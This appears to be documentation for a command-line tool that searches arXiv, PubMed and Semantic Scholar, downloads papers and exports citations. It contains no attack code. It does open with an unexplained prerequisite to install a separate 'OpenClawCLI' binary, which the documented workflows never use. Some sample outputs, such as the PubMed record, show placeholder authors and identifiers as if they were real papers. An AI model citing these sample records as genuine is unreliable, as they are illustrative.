academic-research-hub
Academic Research Hub
Search and retrieve academic papers from multiple sources including arXiv, PubMed, Semantic Scholar, and more. Download PDFs, extract citations, generate bibliographies, and build literature reviews.
⚠️ Prerequisite: Install OpenClawCLI (Windows, MacOS)
Installation Best Practices:
# Standard installation
pip install arxiv scholarly pubmed-parser semanticscholar requests
# If you encounter permission errors, use a virtual environment
python -m venv venv
source venv/bin/activate # On Windows: venv\Scripts\activate
pip install arxiv scholarly pubmed-parser semanticscholar requests
Never use --break-system-packages as it can damage your system's Python installation.
Quick Reference
| Task | Command |
|---|---|
| Search arXiv | python scripts/research.py arxiv "quantum computing" |
| Search PubMed | python scripts/research.py pubmed "covid vaccine" |
| Search Semantic Scholar | python scripts/research.py semantic "machine learning" |
| Download papers | python scripts/research.py arxiv "topic" --download |
| Get citations | python scripts/research.py arxiv "topic" --citations |
| Generate bibliography | python scripts/research.py arxiv "topic" --format bibtex |
| Save results | python scripts/research.py arxiv "topic" --output results.json |
Core Features
1. Multi-Source Search
Search across multiple academic databases from a single interface.
Supported Sources:
- arXiv - Physics, mathematics, computer science, quantitative biology, quantitative finance, statistics
- PubMed - Biomedical and life sciences literature
- Semantic Scholar - Computer science and interdisciplinary research
- Google Scholar - Broad academic search (limited, no API)
2. Paper Download
Download full-text PDFs when available.
python scripts/research.py arxiv "deep learning" --download --output-dir papers/
3. Citation Extraction
Extract and format citations from papers.
Supported formats:
- BibTeX
- RIS
- JSON
- Plain text
4. Metadata Retrieval
Get comprehensive metadata for each paper:
- Title, authors, abstract
- Publication date
- Journal/conference
- DOI, arXiv ID, PubMed ID
- Citation count
- References
Source-Specific Commands
arXiv Search
Search the arXiv repository for preprints.
# Basic search
python scripts/research.py arxiv "quantum computing"
# Filter by category
python scripts/research.py arxiv "neural networks" --category cs.LG
# Filter by date
python scripts/research.py arxiv "transformers" --year 2023
# Download papers
python scripts/research.py arxiv "attention mechanism" --download --max-results 10
Available categories:
cs.AI- Artificial Intelligencecs.LG- Machine Learningcs.CV- Computer Visioncs.CL- Computation and Languagemath.CO- Combinatoricsphysics.optics- Opticsq-bio.GN- Genomics- Full list
Output:
1. Attention Is All You Need
Authors: Vaswani et al.
Published: 2017-06-12
arXiv ID: 1706.03762
Categories: cs.CL, cs.LG
Abstract: The dominant sequence transduction models...
PDF: http://arxiv.org/pdf/1706.03762v5
PubMed Search
Search biomedical literature indexed in PubMed.
# Basic search
python scripts/research.py pubmed "cancer immunotherapy"
# Filter by date range
python scripts/research.py pubmed "CRISPR" --start-date 2023-01-01 --end-date 2023-12-31
# Filter by publication type
python scripts/research.py pubmed "covid vaccine" --publication-type "Clinical Trial"
# Get full text links
python scripts/research.py pubmed "gene therapy" --full-text
Publication types:
- Clinical Trial
- Meta-Analysis
- Review
- Systematic Review
- Randomized Controlled Trial
Output:
1. mRNA vaccine effectiveness against COVID-19
Authors: Smith J, Jones K, et al.
Journal: New England Journal of Medicine
Published: 2023-03-15
PMID: 36913851
DOI: 10.1056/NEJMoa2301234
Abstract: Background: mRNA vaccines have shown...
Full Text: https://www.ncbi.nlm.nih.gov/pmc/articles/PMC9876543/
Semantic Scholar Search
Search computer science and interdisciplinary research.
# Basic search
python scripts/research.py semantic "reinforcement learning"
# Filter by year
python scripts/research.py semantic "graph neural networks" --year 2022
# Get highly cited papers
python scripts/research.py semantic "transformers" --min-citations 100
# Include references
python scripts/research.py semantic "BERT" --include-references
Output includes:
- Citation count
- Influential citation count
- Reference list
- Citing papers
- Fields of study
Output:
1. BERT: Pre-training of Deep Bidirectional Transformers
Authors: Devlin J, Chang MW, Lee K, Toutanova K
Published: 2019
Paper ID: df2b0e26d0599ce3e70df8a9da02e51594e0e992
Citations: 15000+
Influential Citations: 2000+
Fields: Computer Science, Linguistics
Abstract: We introduce a new language representation model...
PDF: https://arxiv.org/pdf/1810.04805.pdf
Essential Options
Result Limits
Control the number of results returned.
--max-results N # Default: 10, range: 1-100
Examples:
python scripts/research.py arxiv "machine learning" --max-results 5
python scripts/research.py pubmed "diabetes" --max-results 50
Output Formats
Choose how results are formatted.
--format <text|json|bibtex|ris|markdown>
Text - Human-readable format (default)
python scripts/research.py arxiv "quantum" --format text
JSON - Structured data for processing
python scripts/research.py arxiv "quantum" --format json
BibTeX - For LaTeX documents
python scripts/research.py arxiv "quantum" --format bibtex
RIS - For reference managers (Zotero, Mendeley)
python scripts/research.py arxiv "quantum" --format ris
Markdown - For documentation
python scripts/research.py arxiv "quantum" --format markdown
Save to File
Save results to a file.
--output <filepath>
Examples:
python scripts/research.py arxiv "AI" --output results.txt
python scripts/research.py pubmed "cancer" --format json --output papers.json
python scripts/research.py semantic "NLP" --format bibtex --output references.bib
Download Papers
Download full-text PDFs when available.
--download
--output-dir <directory> # Where to save PDFs (default: downloads/)
Examples:
# Download to default directory
python scripts/research.py arxiv "deep learning" --download --max-results 5
# Download to specific directory
python scripts/research.py arxiv "transformers" --download --output-dir papers/nlp/
Advanced Features
Citation Extraction
Extract citations from papers.
--citations # Extract citations
--citation-format <format> # bibtex, ris, json (default: bibtex)
Example:
python scripts/research.py arxiv "attention mechanism" --citations --citation-format bibtex --output citations.bib
Date Filtering
Filter by publication date.
arXiv:
--year <YYYY> # Specific year
--start-date <YYYY-MM-DD>
--end-date <YYYY-MM-DD>
PubMed:
--start-date <YYYY-MM-DD>
--end-date <YYYY-MM-DD>
Examples:
python scripts/research.py arxiv "quantum" --year 2023
python scripts/research.py pubmed "vaccine" --start-date 2022-01-01 --end-date 2023-12-31
Author Search
Search for papers by specific authors.
--author "Last, First"
Examples:
python scripts/research.py arxiv "neural networks" --author "Hinton, Geoffrey"
python scripts/research.py semantic "deep learning" --author "Bengio, Yoshua"
Sort Options
Sort results by different criteria.
--sort-by <relevance|date|citations>
Examples:
python scripts/research.py arxiv "machine learning" --sort-by date
python scripts/research.py semantic "NLP" --sort-by citations
Common Workflows
Literature Review
Gather papers on a topic for a literature review.
# Step 1: Search multiple sources
python scripts/research.py arxiv "graph neural networks" --max-results 20 --format json --output arxiv_gnn.json
python scripts/research.py semantic "graph neural networks" --max-results 20 --format json --output semantic_gnn.json
# Step 2: Download key papers
python scripts/research.py arxiv "graph neural networks" --download --max-results 10 --output-dir papers/gnn/
# Step 3: Generate bibliography
python scripts/research.py arxiv "graph neural networks" --max-results 20 --format bibtex --output gnn_references.bib
Finding Recent Research
Track the latest papers in a field.
# Last year's papers
python scripts/research.py arxiv "large language models" --year 2023 --sort-by date --max-results 30
# Last month's biomedical papers
python scripts/research.py pubmed "gene therapy" --start-date 2023-11-01 --end-date 2023-11-30 --format markdown --output recent_gene_therapy.md
Highly Cited Papers
Find influential papers in a field.
python scripts/research.py semantic "reinforcement learning" --min-citations 500 --sort-by citations --max-results 25
Author Publication History
Track an author's work.
python scripts/research.py arxiv "deep learning" --author "LeCun, Yann" --sort-by date --max-results 50 --output lecun_papers.json
Building a Reference Library
Create a comprehensive reference collection.
# Create directory structure
mkdir -p references/{papers,citations}
# Search and download papers
python scripts/research.py arxiv "transformers NLP" --download --max-results 15 --output-dir references/papers/
# Generate citations
python scripts/research.py arxiv "transformers NLP" --max-results 15 --format bibtex --output references/citations/transformers.bib
Cross-Source Validation
Verify findings across multiple databases.
# Search same topic across sources
python scripts/research.py arxiv "federated learning" --max-results 10 --output arxiv_fl.txt
python scripts/research.py semantic "federated learning" --max-results 10 --output semantic_fl.txt
python scripts/research.py pubmed "federated learning" --max-results 10 --output pubmed_fl.txt
# Compare results
diff arxiv_fl.txt semantic_fl.txt
Output Format Examples
Text Format (Default)
Search Results: 3 papers found
1. Attention Is All You Need
Authors: Vaswani, Ashish; Shazeer, Noam; Parmar, Niki; et al.
Published: 2017-06-12
arXiv ID: 1706.03762
Categories: cs.CL, cs.LG
Abstract: The dominant sequence transduction models are based on complex recurrent or convolutional neural networks...
PDF: http://arxiv.org/pdf/1706.03762v5
2. BERT: Pre-training of Deep Bidirectional Transformers
Authors: Devlin, Jacob; Chang, Ming-Wei; Lee, Kenton; Toutanova, Kristina
Published: 2018-10-11
arXiv ID: 1810.04805
Categories: cs.CL
Abstract: We introduce a new language representation model called BERT...
PDF: http://arxiv.org/pdf/1810.04805v2
JSON Format
[
{
"title": "Attention Is All You Need",
"authors": ["Vaswani, Ashish", "Shazeer, Noam", "Parmar, Niki"],
"published": "2017-06-12",
"arxiv_id": "1706.03762",
"categories": ["cs.CL", "cs.LG"],
"abstract": "The dominant sequence transduction models...",
"pdf_url": "http://arxiv.org/pdf/1706.03762v5",
"doi": "10.48550/arXiv.1706.03762"
}
]
BibTeX Format
@article{vaswani2017attention,
title={Attention Is All You Need},
author={Vaswani, Ashish and Shazeer, Noam and Parmar, Niki and Uszkoreit, Jakob and Jones, Llion and Gomez, Aidan N and Kaiser, {\L}ukasz and Polosukhin, Illia},
journal={arXiv preprint arXiv:1706.03762},
year={2017},
url={http://arxiv.org/abs/1706.03762}
}
RIS Format
TY - JOUR
TI - Attention Is All You Need
AU - Vaswani, Ashish
AU - Shazeer, Noam
AU - Parmar, Niki
PY - 2017
DA - 2017/06/12
JO - arXiv preprint
VL - arXiv:1706.03762
UR - http://arxiv.org/abs/1706.03762
ER -
Markdown Format
# Search Results: 3 papers found
## 1. Attention Is All You Need
**Authors:** Vaswani, Ashish; Shazeer, Noam; Parmar, Niki; et al.
**Published:** 2017-06-12
**arXiv ID:** 1706.03762
**Categories:** cs.CL, cs.LG
**Abstract:** The dominant sequence transduction models are based on complex recurrent or convolutional neural networks...
**PDF:** [Download](http://arxiv.org/pdf/1706.03762v5)
Best Practices
Search Strategy
- Start broad - Use general terms to get an overview
- Refine iteratively - Add filters based on initial results
- Use multiple sources - Cross-reference findings
- Check recent papers - Use date filters for current research
Result Management
- Save searches - Use
--outputto preserve results - Organize downloads - Create logical directory structures
- Export citations early - Generate BibTeX as you search
- Track sources - Note which database returned which papers
Download Guidelines
- Respect rate limits - Don't download hundreds of papers at once
- Check licensing - Verify you have rights to use papers
- Organize by topic - Use clear directory names
- Keep metadata - Save JSON alongside PDFs
Citation Practices
- Verify citations - Check DOIs and URLs
- Use standard formats - BibTeX for LaTeX, RIS for reference managers
- Include abstracts - Helpful for later review
- Update regularly - Re-run searches for new papers
Troubleshooting
Installation Issues
"Missing required dependency"
# Install all dependencies
pip install arxiv scholarly pubmed-parser semanticscholar requests
# Or use virtual environment
python -m venv venv
source venv/bin/activate # On Windows: venv\Scripts\activate
pip install arxiv scholarly pubmed-parser semanticscholar requests
"OpenClawCLI not found"
- Download from https://clawhub.ai/
- Install for your OS (Windows/MacOS)
Search Issues
"No results found"
- Try broader search terms
- Check spelling and terminology
- Remove restrictive filters
- Try a different database
"Rate limit exceeded"
- Wait a few minutes before retrying
- Reduce
--max-resultsvalue - Space out requests
"Download failed"
- Check internet connection
- Some papers may not have PDFs available
- Verify you have permissions to access
- Try downloading individually
API Issues
"API timeout"
- The service may be temporarily unavailable
- Retry after a moment
- Check status at respective service websites
"Invalid API response"
- Check if the service is down
- Verify your query syntax
- Try simpler queries
Limitations
Access Restrictions
- Not all papers have downloadable PDFs
- Some content requires institutional access
- Paywalled journals may only show abstracts
- Google Scholar has strict rate limits
Data Completeness
- Citation counts may be outdated
- Not all metadata fields available for every paper
- Some older papers may have incomplete records
- Preprints may not have final publication info
Search Capabilities
- Boolean operators vary by source
- No unified query syntax across databases
- Some databases don't support all filters
- Results may differ from web interface searches
Legal Considerations
- Respect copyright and licensing
- Don't redistribute downloaded papers
- Follow institutional access policies
- Check terms of service for each database
Command Reference
python scripts/research.py <source> "<query>" [OPTIONS]
SOURCES:
arxiv Search arXiv repository
pubmed Search PubMed database
semantic Search Semantic Scholar
REQUIRED:
query Search query string (in quotes)
GENERAL OPTIONS:
-n, --max-results Maximum results (default: 10, max: 100)
-f, --format Output format (text|json|bibtex|ris|markdown)
-o, --output Save to file path
--sort-by Sort by (relevance|date|citations)
FILTERING:
--year Filter by specific year (YYYY)
--start-date Start date (YYYY-MM-DD)
--end-date End date (YYYY-MM-DD)
--author Author name
--min-citations Minimum citation count
ARXIV-SPECIFIC:
--category arXiv category (e.g., cs.AI, cs.LG)
PUBMED-SPECIFIC:
--publication-type Publication type filter
--full-text Include full text links
SEMANTIC-SPECIFIC:
--include-references Include paper references
DOWNLOAD:
--download Download paper PDFs
--output-dir Download directory (default: downloads/)
CITATIONS:
--citations Extract citations
--citation-format Citation format (bibtex|ris|json)
HELP:
--help Show all options
Examples by Use Case
Quick Search
# Find recent papers
python scripts/research.py arxiv "quantum computing"
# Search biomedical literature
python scripts/research.py pubmed "alzheimer disease"
Comprehensive Research
# Search multiple sources
python scripts/research.py arxiv "neural networks" --max-results 30 --output arxiv.json
python scripts/research.py semantic "neural networks" --max-results 30 --output semantic.json
# Download important papers
python scripts/research.py arxiv "neural networks" --download --max-results 10
Citation Management
# Generate BibTeX
python scripts/research.py arxiv "deep learning" --format bibtex --output dl_refs.bib
# Export to reference manager
python scripts/research.py pubmed "gene editing" --format ris --output genes.ris
Tracking New Research
# This month's papers
python scripts/research.py arxiv "LLM" --start-date 2024-01-01 --sort-by date
# Recent highly-cited work
python scripts/research.py semantic "transformers" --year 2023 --min-citations 50
Support
For issues or questions:
- Check this documentation
- Run
python scripts/research.py --help - Verify dependencies are installed
- Check database-specific documentation
Resources:
- OpenClawCLI: https://clawhub.ai/
- arXiv API: https://arxiv.org/help/api
- PubMed API: https://www.ncbi.nlm.nih.gov/books/NBK25501/
- Semantic Scholar API: https://api.semanticscholar.org/